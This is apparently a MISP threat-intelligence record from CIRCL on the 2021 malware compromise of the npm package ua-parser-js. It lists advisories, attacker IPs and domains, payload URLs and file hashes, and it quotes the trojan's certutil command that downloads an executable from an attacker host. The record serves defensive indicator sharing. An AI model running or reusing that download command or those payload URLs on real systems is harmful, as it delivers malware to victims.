2023-04-21 13:25:09 +00:00
{
"Event" : {
"analysis" : "2" ,
"date" : "2021-10-24" ,
"extends_uuid" : "" ,
"info" : "Malware Discovered in Popular NPM Package, ua-parser-js" ,
"publish_timestamp" : "1635064007" ,
"published" : true ,
"threat_level_id" : "2" ,
"timestamp" : "1635063955" ,
"uuid" : "ad7665ec-fef2-44eb-a019-b1b25a8aec05" ,
"Orgc" : {
"name" : "CIRCL" ,
"uuid" : "55f6ea5e-2c60-40e5-964f-47a8950d210f"
} ,
"Tag" : [
{
"colour" : "#004646" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "type:OSINT" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0071c3" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:lifetime=\"perpetual\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0087e8" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "osint:certainty=\"50\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#ffffff" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "tlp:white" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#053a00" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-attack-pattern=\"Compromise Software Supply Chain - T1195.002\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
} ,
{
"colour" : "#0088cc" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "misp-galaxy:mitre-attack-pattern=\"Compromise Software Dependencies and Development Tools - T1195.001\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
] ,
"Attribute" : [
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635061972" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "e9d82a66-46bd-4f0e-aeac-17349abddeb0" ,
"value" : "https://github.com/advisories/GHSA-pjwm-rvh2-c87w"
} ,
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062091" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"value" : "https://github.com/faisalman/ua-parser-js/issues/536"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062310" ,
"to_ids" : false ,
"type" : "url" ,
"uuid" : "f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"value" : "http://159.148.186.228/download/jsextension.exe"
} ,
{
"category" : "Payload delivery" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062343" ,
"to_ids" : true ,
"type" : "url" ,
"uuid" : "b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"value" : "https://citationsherbe.at/sdd.dll"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062385" ,
"to_ids" : true ,
"type" : "domain" ,
"uuid" : "3e4cc221-dbb9-4e64-9523-800d8af8f972" ,
"value" : "citationsherbe.at"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062444" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "1b1a28a9-2b47-43a3-92b9-c9353497f429" ,
"value" : "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "jsextension.exe" ,
"deleted" : false ,
"disable_correlation" : false ,
"timestamp" : "1635062474" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "9163b990-5b87-413c-a8e7-f616b908157f" ,
"value" : "47dded0efc230c3536f4db1e2e476afd3eda8d8ea0537db69d432322cdbac9ca"
}
] ,
"Object" : [
{
"comment" : "" ,
"deleted" : false ,
"description" : "Metadata used to generate an executive level report" ,
"meta-category" : "misc" ,
"name" : "report" ,
"template_uuid" : "70a68471-df22-4e3f-aa1a-5a3be19f82df" ,
"template_version" : "4" ,
"timestamp" : "1635063955" ,
"uuid" : "30866961-7eda-4bb7-a5e8-cb0bfeebce4c" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "30866961-7eda-4bb7-a5e8-cb0bfeebce4c" ,
"referenced_uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"relationship_type" : "alerts" ,
"timestamp" : "1635063955" ,
"uuid" : "892ba669-5323-41f2-b7bf-9093d813aea2"
}
] ,
"Attribute" : [
{
"category" : "External analysis" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "link" ,
"timestamp" : "1635061938" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "10d9ac50-3208-4cff-9d07-c2bec1c192c8" ,
"value" : "https://us-cert.cisa.gov/ncas/current-activity/2021/10/22/malware-discovered-popular-npm-package-ua-parser-js"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "summary" ,
"timestamp" : "1635061938" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "5faebe54-7492-4f23-99f8-edf5e24e5424" ,
"value" : "Versions of a popular NPM package named ua-parser-js was found to contain malicious code. ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. A computer or device with the affected software installed or running could allow a remote attacker to obtain sensitive information or take control of the system. \r\n\r\nCISA urges users and administers using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions: 0.7.30, 0.8.1, 1.0.1 \r\n\r\nFor more information, see Embedded malware in ua-parser-js."
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "type" ,
"timestamp" : "1635061938" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "0e1e4035-31a1-4df6-8aa9-2a6208f7f601" ,
"value" : "Alert"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1635063837" ,
"uuid" : "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"referenced_uuid" : "e1f2c049-da88-4238-9dde-4134209c1364" ,
"relationship_type" : "is-in-relation-with" ,
"timestamp" : "1635062957" ,
"uuid" : "97af4dfa-5d0a-47c5-ba72-e00f65c25482"
} ,
{
"comment" : "" ,
"object_uuid" : "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"referenced_uuid" : "f51805cb-5fec-4ce1-b7ae-1d1206720542" ,
"relationship_type" : "downloads" ,
"timestamp" : "1635063003" ,
"uuid" : "e205642b-21b0-4daa-a28f-275219dba1ba"
} ,
{
"comment" : "" ,
"object_uuid" : "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"referenced_uuid" : "9163b990-5b87-413c-a8e7-f616b908157f" ,
"relationship_type" : "related-to" ,
"timestamp" : "1635063837" ,
"uuid" : "d3629ef3-282a-4527-813e-ec8fa5be906d"
}
] ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1635062024" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "974258e7-2e79-413c-9be8-08698653b87b" ,
"value" : "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe"
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1635062024" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "e3df3b20-a215-40d4-ae1a-a9ed768de240" ,
"value" : "The trojan try to execute in the cmd"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "Command line and option related to a software malicious or not to execute specific commands." ,
"meta-category" : "misc" ,
"name" : "command-line" ,
"template_uuid" : "88ebe222-d3cc-11e9-875d-7f13f460adaf" ,
"template_version" : "1" ,
"timestamp" : "1635063109" ,
"uuid" : "57d3ed7e-eda9-4e5e-b7ac-a813415e9006" ,
"ObjectReference" : [
{
"comment" : "Checking the date range of vulnerable packages" ,
"object_uuid" : "57d3ed7e-eda9-4e5e-b7ac-a813415e9006" ,
"referenced_uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"relationship_type" : "identifies" ,
"timestamp" : "1635063109" ,
"uuid" : "7b9af0b8-1e55-4ac8-ad04-5b96b576fc98"
}
] ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "value" ,
"timestamp" : "1635062225" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "4834122d-b43b-4b8d-a9d1-3085611ebaec" ,
"value" : "npm show ua-parser-js time" ,
"Tag" : [
{
"colour" : "#0fbf00" ,
2023-05-19 09:05:37 +00:00
"local" : "0" ,
"name" : "cycat:scope=\"detection\"" ,
"relationship_type" : ""
2023-04-21 13:25:09 +00:00
}
]
} ,
{
"category" : "Other" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "description" ,
"timestamp" : "1635062193" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "542061ee-8993-44ef-8261-f27f25dc9067" ,
"value" : "To check the time when the package was installed"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "A domain/hostname and IP address seen as a tuple in a specific time frame." ,
"meta-category" : "network" ,
"name" : "domain-ip" ,
"template_uuid" : "43b3b146-77eb-4931-b4cc-b66c60f28734" ,
"template_version" : "10" ,
"timestamp" : "1635063682" ,
"uuid" : "116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"referenced_uuid" : "3e4cc221-dbb9-4e64-9523-800d8af8f972" ,
"relationship_type" : "is-in-relation-with" ,
"timestamp" : "1635063351" ,
"uuid" : "83bd1f6f-8d62-4da9-a6d5-4f74d5ea48e1"
} ,
{
"comment" : "" ,
"object_uuid" : "116cfff2-f422-4b59-a5aa-630fc443be4b" ,
"referenced_uuid" : "b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"relationship_type" : "related-to" ,
"timestamp" : "1635063682" ,
"uuid" : "177395ef-d715-4122-97ca-be60b7b975fb"
}
] ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "domain" ,
"timestamp" : "1635062540" ,
"to_ids" : true ,
"type" : "domain" ,
"uuid" : "75318d44-9526-43f4-9f8c-c24edf26a83f" ,
"value" : "citationsherbe.at"
} ,
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1635062540" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "dc052f3a-24fa-4595-8deb-6efb68b59d64" ,
"value" : "95.213.165.20"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "A domain/hostname and IP address seen as a tuple in a specific time frame." ,
"meta-category" : "network" ,
"name" : "domain-ip" ,
"template_uuid" : "43b3b146-77eb-4931-b4cc-b66c60f28734" ,
"template_version" : "10" ,
"timestamp" : "1635062582" ,
"uuid" : "e1f2c049-da88-4238-9dde-4134209c1364" ,
"Attribute" : [
{
"category" : "Network activity" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "ip" ,
"timestamp" : "1635062582" ,
"to_ids" : true ,
"type" : "ip-dst" ,
"uuid" : "2c40cba0-709f-42e0-8f09-9373862a40ac" ,
"value" : "159.148.186.228"
}
]
} ,
{
"comment" : "Vulnerable npm package UAParser.js - '0.7.29': '2021-10-22T12:15:21.378Z',\r\n'0.7.30': '2021-10-22T16:16:08.807Z',\r\n\r\n'0.8.0': '2021-10-22T12:16:06.877Z',\r\n'0.8.1': '2021-10-22T16:23:53.062Z',\r\n\r\n'1.0.0': '2021-10-22T12:16:19.726Z',\r\n'1.0.1': '2021-10-22T16:26:19.004Z',\r\n" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1635063704" ,
"uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"referenced_uuid" : "459c41f0-70a7-44ce-b9b0-7f1fc7d2903e" ,
"relationship_type" : "executes" ,
"timestamp" : "1635062818" ,
"uuid" : "73a1835e-a0dc-40f2-a86a-172af4025954"
} ,
{
"comment" : "" ,
"object_uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"referenced_uuid" : "b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"relationship_type" : "downloads" ,
"timestamp" : "1635063384" ,
"uuid" : "9f095fe7-ced7-4685-942b-5cbfa35b32c4"
} ,
{
"comment" : "" ,
"object_uuid" : "3f6f1f5f-b847-4fd1-be30-6f43601c26cd" ,
"referenced_uuid" : "508a294c-876e-4a8a-a3bd-a3de15e10325" ,
"relationship_type" : "describes" ,
"timestamp" : "1635063704" ,
"uuid" : "2a6e821d-81d7-45a6-b420-f8929fc38035"
}
] ,
"Attribute" : [
{
"category" : "Payload installation" ,
"comment" : "" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "pattern-in-file" ,
"timestamp" : "1635062757" ,
"to_ids" : true ,
"type" : "pattern-in-file" ,
"uuid" : "fbc77d66-169a-48bb-82c5-7ce5c847e205" ,
"value" : "ua-parser-js"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "File object describing a file with meta-information" ,
"meta-category" : "file" ,
"name" : "file" ,
"template_uuid" : "688c46fb-5edb-40a3-8273-1af7923e2215" ,
"template_version" : "24" ,
"timestamp" : "1635063451" ,
"uuid" : "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "bb6df499-a3fc-4a79-b7f2-5dfc4a277c2b" ,
"referenced_uuid" : "a9b50a3c-793f-4541-a123-60716668e2d5" ,
"relationship_type" : "analysed-with" ,
"timestamp" : "1635063452" ,
"uuid" : "e0b56508-2235-4dd3-ad3f-ebf948afa2bf"
}
] ,
"Attribute" : [
{
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "md5" ,
"timestamp" : "1635062444" ,
"to_ids" : true ,
"type" : "md5" ,
"uuid" : "1b724674-e8c6-4deb-a32b-b6cf86b591a6" ,
"value" : "de8b54a938ac18f15cad804d79a0e19d"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha1" ,
"timestamp" : "1635062444" ,
"to_ids" : true ,
"type" : "sha1" ,
"uuid" : "88ee0d56-6d8a-4869-9443-1dbe333121c2" ,
"value" : "b6004c62e2d9dbad9cfd5f7e18647ac983788766"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : false ,
"object_relation" : "sha256" ,
"timestamp" : "1635062444" ,
"to_ids" : true ,
"type" : "sha256" ,
"uuid" : "22a01316-f9ba-4889-9d29-eaf021bb104b" ,
"value" : "2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd"
}
]
} ,
{
"comment" : "" ,
"deleted" : false ,
"description" : "VirusTotal report" ,
"meta-category" : "misc" ,
"name" : "virustotal-report" ,
"template_uuid" : "d7dd0154-e04f-4c34-a2fb-79f3a3a52aa4" ,
"template_version" : "4" ,
"timestamp" : "1635063777" ,
"uuid" : "a9b50a3c-793f-4541-a123-60716668e2d5" ,
"ObjectReference" : [
{
"comment" : "" ,
"object_uuid" : "a9b50a3c-793f-4541-a123-60716668e2d5" ,
"referenced_uuid" : "b6541760-d7e6-432b-9715-eae2ce06ad83" ,
"relationship_type" : "related-to" ,
"timestamp" : "1635063777" ,
"uuid" : "3055c698-4f96-41d1-819b-26520b4b5eea"
}
] ,
"Attribute" : [
{
"category" : "Other" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "last-submission" ,
"timestamp" : "1635062444" ,
"to_ids" : false ,
"type" : "datetime" ,
"uuid" : "a38e6a9c-1573-4b68-b9ee-dfdda8eb57ed" ,
"value" : "2021-10-24T04:03:55+00:00"
} ,
{
"category" : "External analysis" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "permalink" ,
"timestamp" : "1635062444" ,
"to_ids" : false ,
"type" : "link" ,
"uuid" : "37fe948f-89f7-4316-bdf3-c88fdbd16b11" ,
"value" : "https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/detection/f-2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd-1635048235"
} ,
{
"category" : "Artifacts dropped" ,
"comment" : "sdd.dll" ,
"deleted" : false ,
"disable_correlation" : true ,
"object_relation" : "detection-ratio" ,
"timestamp" : "1635062444" ,
"to_ids" : false ,
"type" : "text" ,
"uuid" : "b36b2447-2d9b-4993-b23b-2ff46ad63d7c" ,
"value" : "23/50"
}
]
}
]
}
}